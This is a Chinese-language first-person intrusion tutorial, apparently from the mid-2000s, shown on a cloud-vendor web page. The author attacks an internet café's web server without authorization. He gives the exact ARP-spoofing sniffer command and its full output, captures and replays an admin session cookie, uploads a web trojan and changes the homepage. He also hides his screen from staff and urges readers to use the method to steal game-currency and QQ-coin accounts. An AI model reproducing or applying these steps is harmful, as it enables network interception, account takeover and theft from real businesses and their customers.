放假回家,暫時沒有自己的電腦,只能跑網吧。開啟ie就看見網吧首頁。。。這個網吧是我家附近作的最好的。在這裡玩過幾次,也提醒過老闆一些漏洞。不過漏洞天天更新麼~
是個2級網域名稱111.lzbiz.com。換成www,竟然是個駭客網站。。。名字叫做“中國駭客”哈。。。看來這裡有駭客罩著。偶看看能不能挑戰下~~
(圖1)
首葉的系統必須要知道密碼才可以進去。再看看別的系統。Oblog1.0古老阿。。。害得我找了N長時間他內建的EWEBEDITOR的預設密碼,都沒有找到。只是這個版本有注入,拿到管理員密碼登陸。暈。。。指令碼錯誤。。。看來是程式問題。
網吧後台因為我上次幫他檢測過,他把登陸地址換了。猜,是猜不到的。我記得這個系統上次進去後可以直接上傳asp的。但是需要session驗證。網站和網吧的首葉是同一個ip的。從外網看,是網吧的ip。應該是路由上映射出去的。所以不能確定是不是同一台主機。既然是同個網吧,我就想到了arp欺騙。所以必須確認是哪一台伺服器。剛好有個asp探針在伺服器上。地址是aspcheck.asp,
(圖2)
192.168.0.251
修改host檔案,把www.lzbiz.com和網吧首頁,都指向到這個內部ip。瀏覽正常。說明這兩個站都在同一個伺服器上。這次有了目標了。Arp欺騙。可以弄到他對外發的資訊,和外面向他發的資訊。既然是伺服器,那應該沒有人在上面。所以,我主要想嗅探到對他80,21的資料。可能的結果是一些密碼,後台登陸地址,ftp密碼,等等。。。反正他網站總要維護的。
先看看是否滿足條件。在網吧搞這個,最好不要太囂張,畢竟被網管看見了不好。所以先把cmd的背景顏色改成白色。
(圖3)
C:/Documents and Settings/user>color f7
這個不止用一次的,後面需要不斷的查看cmd視窗,被人家看見了,就知道肯定不幹好事。。。好了。下載一些工具。
地址:http://cnxhacker.net/download/show/1474.html
Arp cheat and sniffer V2.1
執行wpcapinstall.exe在dos下安靜安裝winpcap。沒有這個程式執行會出錯。說明一下實際的情況。因為網吧有幾百機子,每台開啟ie首葉就是這個網吧首葉。而網吧首葉剛好和那個站同一個機子。所以資訊量很大,需要慢慢排除。工作量也就很大了。
執行命令。
arpsf -cheatsniff -t 192.168.0.251 -g 192.168.0.253 -sniffpacket -p TCP -sp 80,21 -o d:/siff.txt -w 0 -m 100
他的ip是192.168.0.251,網關是192.168.0.253,嗅探源連接埠80.21。
************************可愛的分割線***********************
C:/arp2>arpsf -cheatsniff -t 192.168.0.251 -g 192.168.0.253 -sniffpacket -p TCP
-sp 80,25,23,110 -o d:/siff.txt -w 0 -m 100
======================================================
Arp Cheat And Sniffer V2.1
powered by shadow @2005/6/15
my web:http://www.codehome.6600.0rg
======================================================
+Choose a method to get adapter list:
->0.Get By Winpcap Driver!
->1.Get By IpHelpAPI (Can use this in 2003)!
Please input your choose num:1
+Adapater List:
Try to get adapter list by iphelpapi...
----------------------------------------------------
0:/Device/NPF_{ACB13381-0E41-4EC2-86E9-CC6B4F8F821C}
Please choose a adapter with num:0
>>This is user define:
Protocol: [TCP]
Source IP: [192.168.0.251 ] Source Port: [80,25,23,110]
Dest IP: [* ] Dest Port: [*]
Sniff SMTP: [false]
Sniff POP: [false]
Sniff FTP: [false]
Sniff Telnet: [false]
Sniff POST: [false]
Sniff PACKET: [true]
Sniff Filter: [true]
Sniff Way: [si<->di]
Sniff Mode: [high]
Sniff TimeOut: [120] seconds
Save File Path: [d:/siff.txt]
Max File Len : [100] M
Save File Mode: [ASC]
Try to get Mac of [ 192.168.0.251 ]
This IP’s MAc is: [ 000aeb22b5f4 ]
+OK:擷取目標mac地址成功!
Try to get Mac of [ 192.168.0.253 ]
-Can not get mac by netbios -_-
-Try to use ping to get mac...
Pinging 192.168.0.253 with 32 bytes of data:
Reply from 192.168.0.253: bytes=32 time<1ms TTL=64
Reply from 192.168.0.253: bytes=32 time<1ms TTL=64
Reply from 192.168.0.253: bytes=32 time<1ms TTL=64
Reply from 192.168.0.253: bytes=32 time<1ms TTL=64
Ping statistics for 192.168.0.253:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
+ping ok done...
This IP’s MAc is: [ 0007e91bded5 ]
+OK:擷取網關mac地址成功!
Try to get Mac of [ 192.168.0.126 ]
This IP’s MAc is: [ 000aeb22a806 ]
+OK:擷取自身mac地址成功!
Try to set static ip mac table...
+Ok
-->開始欺騙第一個目標主機...
欺騙源ip: 192.168.0.253 欺騙源mac: 000aeb22a806
受騙主機: 192.168.0.251 受騙的mac: 000aeb22b5f4
...
-->開始欺騙第二個目標主機...
欺騙源ip: 192.168.0.251 欺騙源mac: 000aeb22a806
受騙主機: 192.168.0.253 受騙的mac: 0007e91bded5
...
<--雙向欺騙完成
+Cheat ok,start sniff...
Press any key to stop :)
TCP 192.168.0.251 80 --> 221.13.130.50 1703 1460 Bytes 2006-1-20 9:2
2:42
------------------------------------------------------
TCP 192.168.0.251 80 --> 221.13.130.50 1703 1460 Bytes 2006-1-20 9:2
2:43
------------------------------------------------------
TCP 192.168.0.251 80 --> 221.13.130.50 1703 1460 Bytes 2006-1-20 9:2
2:43
------------------------------------------------------
TCP 192.168.0.251 80 --> 221.13.130.50 1703 1460 Bytes 2006-1-20 9:2
2:44
------------------------------------------------------
************************可愛的分割線***********************
螢幕上都是如上流動的資料。直到檔案大於100m的時候自動刪除,然後再產生。
+Choose a method to get adapter list:
->0.Get By Winpcap Driver!
->1.Get By IpHelpAPI (Can use this in 2003)!
這裡選1,我的系統是xp。前一個選項時使用Winpcap,來驅動,我這裡出錯了,所以使用1的選項。
0:/Device/NPF_{ACB13381-0E41-4EC2-86E9-CC6B4F8F821C}
Please choose a adapter with num:0
這裡選0,其他的資訊自動出現。
可別認為資料小。。。五分鐘時間,就10兆了。。。剪下出來(程式會自動再產生),開啟,搜尋pass,搜尋admin,找到有用的,記錄下來,然後再清理資料。如此重複。。。一上午過去了。。。終於截到了管理員登陸背景密碼和cookies值。
(圖4)
********************可愛的分割線*****************
| Cookie: __utma=209638473.866599531.1137740948.1137748682.1137748860.3; __utmb=209638473; __utmz=209638473.1137740948.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDSAQDCSBB=HHEO*************************; __utmc=209638473 |
********************可愛的分割線*****************
這個可是比密碼管用多了,密碼16位md5,還要破半天。有了這個東西,就直接開啟manage.asp了,也不用找他的登陸葉面登陸。
Webtool 4.0桂林老兵的作品。
地址:http://cnxhacker.net/download/show/1199.html
自訂cookies為截獲的內容,然後get後台葉面manage.asp。
剩下的就是上傳木馬了。這個伺服器安全比較差,雖然lzbiz的ftp使用者根目錄不可見,但是他有asp探針啊!直接輸入到根目錄。就可以改首葉了。沒有寫入權限,可惜ftp密碼和blog密碼一樣,使用者名稱在serv_u目錄裡找到了。登陸,修改。
入侵這個站,有一點比較讓人鬱悶就是,他的系統雖然大都是老闆本,裡面有oblog1.0,塵緣雅境3.0,音樂系統,bbs,等等。。。全都是老的版本。。。漏洞一堆,都可以拿到密碼,但是就是不能找到真正有用的後台。而所知道的後台卻把登陸葉面隱藏了。麻煩了一天時間才搞定。管理員根據這篇文章,採取下安全措施吧。
這種方法,可以用於網吧盜取網管的重值遊戲幣,q幣帳號。
如果把arp欺騙的目標定為網吧收帳的機子,目的連接埠為80,然後再去巴台要求重值遊戲幣,一定很好玩的。。。不過不要說是我教你們的哦.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
